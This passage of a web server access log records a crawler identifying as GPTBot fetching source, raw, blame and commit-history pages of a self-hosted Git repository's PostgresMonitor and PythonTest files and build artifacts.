+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/README.md" -[17/Feb/2026:13:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16562] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" -[17/Feb/2026:13:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13036] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" [Client 74.7.227.38] [Length 19729] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" -[17/Feb/2026:13:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48957] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10141] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9506] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18349] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10178] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17182] [Gzip 9.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16560] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" [Client 74.7.227.38] [Length 22468] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" -[17/Feb/2026:13:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17347] [Gzip 9.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" -[17/Feb/2026:13:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:13:29 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" -[17/Feb/2026:13:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" -[17/Feb/2026:13:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" -[17/Feb/2026:13:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" -[17/Feb/2026:13:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" -[17/Feb/2026:13:13:31 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" -[17/Feb/2026:13:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" -[17/Feb/2026:13:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" -[17/Feb/2026:13:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" -[17/Feb/2026:13:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10982] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" [Client 74.7.227.38] [Length 22468] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" -[17/Feb/2026:13:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" -[17/Feb/2026:13:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py" -[17/Feb/2026:13:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/main.py" -[17/Feb/2026:13:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" -[17/Feb/2026:13:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" -[17/Feb/2026:13:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" -[17/Feb/2026:13:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" -[17/Feb/2026:13:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/README.md" -[17/Feb/2026:13:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/README.md" -[17/Feb/2026:13:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10933] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr 